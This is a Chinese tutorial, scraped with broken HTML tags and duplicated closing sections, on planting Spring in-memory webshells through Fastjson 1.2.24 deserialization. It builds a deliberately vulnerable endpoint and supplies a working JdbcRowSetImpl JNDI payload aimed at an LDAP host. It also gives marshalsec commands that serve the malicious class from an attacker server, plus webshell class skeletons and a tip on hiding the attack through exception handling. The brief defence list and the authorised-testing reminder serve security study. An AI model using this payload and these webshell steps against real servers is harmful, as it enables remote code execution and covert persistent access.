Spring内存马学习与实践指南（二）<\/h1>

1. Fastjson反序列化漏洞环境搭建<\/h2>

1.1 环境准备<\/h3>

在Spring Boot项目中引入Fastjson 1.2.24版本（存在漏洞的版本）：<\/p>

<dependency><\/span>
<\/span><\/span>    <groupId><\/span>com.alibaba<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>fastjson<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>1.2.24<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>1.2 创建漏洞触发端点<\/h3>
创建FastJsonController<\/code>控制器，提供POST接口用于触发Fastjson反序列化：<\/p>
package<\/span> org.example.springmemory.controller;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> com.alibaba.fastjson.JSON;<\/span>
<\/span><\/span>import<\/span> org.springframework.stereotype.Controller;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.RequestBody;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.RequestMapping;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.RequestMethod;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.ResponseBody;<\/span>
<\/span><\/span>
<\/span><\/span>@Controller<\/span>
<\/span><\/span>public<\/span> class<\/span> FastJsonController<\/span> {<\/span>
<\/span><\/span>    @ResponseBody<\/span>
<\/span><\/span>    @RequestMapping<\/span>(<\/span>value =<\/span> "\/FastJson"<\/span>,<\/span> method =<\/span> RequestMethod.<\/span>POST<\/span>)<\/span>
<\/span><\/span>    public<\/span> String test<\/span>(<\/span>@RequestBody<\/span> String vul){<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>vul);<\/span>
<\/span><\/span>        JSON.<\/span>parseObject<\/span>(<\/span>vul);<\/span>
<\/span><\/span>        return<\/span> vul;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>1.3 测试漏洞<\/h3>
使用JNDI注入工具和以下payload进行测试：<\/p>
POST \/FastJson HTTP\/1.1
Host: localhost:8080
Content-Type: application\/json; charset=utf-8
Content-Length: 273

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap:\/\/192.168.1.8:1389\/Basic\/Command\/calc",
        "autoCommit":true
    }
}
<\/code><\/pre>
2. Controller内存马实现<\/h2>
2.1 内存马类编写<\/h3>
创建ControllerMemory<\/code>类，直接在类中编写恶意代码（不使用内部类）：<\/p>
\/\/ 示例代码结构（具体实现需根据实际需求）
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> ControllerMemory<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 恶意代码实现
<\/span><\/span><\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 执行方法
<\/span><\/span><\/span><\/span>    public<\/span> void<\/span> exec<\/span>()<\/span> {<\/span>
<\/span><\/span>        \/\/ 恶意操作实现
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键修改点：<\/p>

将执行方法直接放在本类中<\/li>
静态代码块中实现注入逻辑<\/li>
确保类名和方法调用的一致性<\/li>
<\/ol>
2.2 部署与执行<\/h3>

将编译后的ControllerMemory.class<\/code>文件放在可访问的HTTP服务目录<\/li>
使用marshalsec工具启动LDAP服务：
java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http:\/\/your-ip:port\/#ControllerMemory 9999
<\/code><\/pre>
<\/li>
发送精心构造的Fastjson payload触发漏洞<\/li>
<\/ol>
3. Interceptor内存马实现<\/h2>
3.1 内存马类编写<\/h3>
创建InterceptorMemory<\/code>类，继承HandlerInterceptor<\/code>：<\/p>
public<\/span> class<\/span> InterceptorMemory<\/span> implements<\/span> HandlerInterceptor {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 注入逻辑
<\/span><\/span><\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> boolean<\/span> preHandle<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response,<\/span> Object handler)<\/span> {<\/span>
<\/span><\/span>        \/\/ 恶意操作实现
<\/span><\/span><\/span><\/span>        return<\/span> true<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 其他必要方法...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 部署与执行<\/h3>

将编译后的InterceptorMemory.class<\/code>文件放在可访问的HTTP服务目录<\/li>
使用marshalsec工具启动LDAP服务：
java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http:\/\/your-ip:port\/#InterceptorMemory 9999
<\/code><\/pre>
<\/li>
发送精心构造的Fastjson payload触发漏洞<\/li>
<\/ol>
4. 关键注意事项<\/h2>

版本选择<\/strong>：必须使用存在漏洞的Fastjson版本（如1.2.24）<\/li>
类加载机制<\/strong>：理解Java类加载机制对内存马实现至关重要<\/li>
异常处理<\/strong>：妥善处理异常避免暴露攻击行为<\/li>
路径问题<\/strong>：确保内存马类文件可通过HTTP访问<\/li>
调试技巧<\/strong>：遇到问题时通过debug定位问题原因<\/li>
<\/ol>
5. 防御措施<\/h2>

及时升级Fastjson到最新安全版本<\/li>
限制反序列化的类白名单<\/li>
监控异常的JNDI请求<\/li>
实施严格的输入验证<\/li>
使用安全产品检测内存马行为<\/li>
<\/ol>
6. 参考资源<\/h2>

Spring官方文档<\/a><\/li>
Fastjson安全公告<\/li>
Java反序列化漏洞研究资料<\/li>
<\/ul>
请务必在合法授权环境下进行相关测试和研究，遵守法律法规。<\/p>

Spring内存马学习与实践指南（二）<\/h1>

1. Fastjson反序列化漏洞环境搭建<\/h2>

2. Controller内存马实现<\/h2>

3. Interceptor内存马实现<\/h2>

6. 参考资源<\/h2> Spring官方文档<\/a><\/li> Fastjson安全公告<\/li> Java反序列化漏洞研究资料<\/li> <\/ul> 请务必在合法授权环境下进行相关测试和研究，遵守法律法规。<\/p>

6. 参考资源<\/h2>

Spring官方文档<\/a><\/li>
Fastjson安全公告<\/li>
Java反序列化漏洞研究资料<\/li> <\/ul>
请务必在合法授权环境下进行相关测试和研究，遵守法律法规。<\/p>